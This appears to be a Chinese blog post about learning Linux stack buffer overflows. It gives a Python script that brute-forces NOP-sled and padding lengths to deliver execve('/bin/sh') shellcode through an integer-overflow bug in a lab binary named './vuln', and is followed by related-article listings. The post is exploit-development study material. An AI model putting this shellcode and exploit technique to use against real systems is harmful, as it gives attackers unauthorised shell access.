学习Linux BOF的时候,看了这个文章,https://sploitfun.wordpress.com/2015/06/23/integer-overflow/ ,原文给出的exp无法成功, 此时除了计算并填充buf还可以用其他方法来复现这个问题:

#!/usr/bin/env python

import struct

from subprocess import call

def fuzzme(i,j):

    print i,j

    arg1 = "sploitfun"

#stack address where shellcode is copied.

    ret_addr = 0xbfffefb0 

#spawn a shell

#execve(/bin/sh)

    scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

#endianess convertion

    def conv(num):

        return struct.pack("<I",num)

# arg2 = Junk + RA + NOP's + Shellcode

    arg2 = "A" * 24

    arg2 += conv(ret_addr);

    arg2 += "\x90" * i

    arg2 += scode

    arg2 += "C" * j

    print "Calling vulnerable program"

    call(["./vuln", arg1, arg2])

if __name__ == '__main__':

    for i in range(1,300):

        for j in range(1,300):

            fuzzme(i,j)



简单粗暴...

A trick in Exploit Dev的更多相关文章

  1. reds Virtual Memory

    Virtual Memory technical specification This document details the internals of the Redis Virtual Memo ...

  2. redis虚拟内存---官方文档

    http://redis.io/topics/internals-vm Virtual Memory technical specification This document details the ...

  3. BlackArch-Tools

    BlackArch-Tools 简介 安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 ...

  4. /dev/socket/vold exploit 本地提权漏洞

    EXPLOIT "0 asec create ../../../../../../../../xxxxx/xx/xx/xx 1 ext4 98235792350852308254872354 ...

  5. An iOS zero-click radio proximity exploit odyssey

    NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 1 ...

  6. Machine Learning Trick of the Day (2): Gaussian Integral Trick

    Machine Learning Trick of the Day (2): Gaussian Integral Trick Today's trick, the Gaussian integral ...

  7. Machine Learning Trick of the Day (1): Replica Trick

    Machine Learning Trick of the Day (1): Replica Trick 'Tricks' of all sorts are used throughout machi ...

  8. Plain text considered harmful: A cross-domain exploit

    referer:http://balpha.de/2013/02/plain-text-considered-harmful-a-cross-domain-exploit/ Data from aro ...

  9. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

随机推荐

  1. 源码-集合:ArrayList

    只是文章摘录,还未研究 JAVA ArrayList详细介绍(示例) http://www.jb51.net/article/42764.htm Jdk1.6 JUC源码解析汇总 - 永远保持敬畏之心 ...

  2. jmeter插件下载

    https://jmeter-plugins.org/wiki/Start/ 插件下载好后,将插件lib目录下的jar包放在jmeter安装目录下的lib里,插件ext目录下的jar包放在jmeter ...

  3. 企业级Tomcat部署配置

    1.1 Tomcat简介 Tomcat是Apache软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache.Sun和其他一些公司及个人 ...

  4. Python 学习笔记之 Numpy 库——数组基础

    1. 初识数组 import numpy as np a = np.arange(15) a = a.reshape(3, 5) print(a.ndim, a.shape, a.dtype, a.s ...

  5. 《鸟哥的Linux私房菜》读书笔记

    第五章  初次使用Linux man.info的使用 组合键:切换登录环境.Tab.Ctrl+c.Ctrl+d 正确关机的方法 开机过程的问题排解:文件系统错误.忘记root密码 第六章  文件权限& ...

  6. [译]Python - socket.error: Cannot assign requested address

    原文来源: https://stackoverflow.com/questions/48306528/python-socket-error-cannot-assign-requested-addre ...

  7. Android流式布局控件

    1,自定义flowlayout代码 package com.hyang.administrator.studentproject.widget; import android.content.Cont ...

  8. 解决hadoop no dataNode to stop问题

    错误原因: datanode的clusterID 和 namenode的 clusterID 不匹配. 解决办法: 1. 打开 hadoop/tmp/dfs/namenode/name/dir 配置对 ...

  9. not1,not2,bind1st,bind2nd

    例子需要包含头文件 #include <vector> #include <algorithm> #include <functional> bind1st和bin ...

  10. 6for Java

    class Check{ public boolean validate(String name,   String password){  if(name.equals("xuzhaoni ...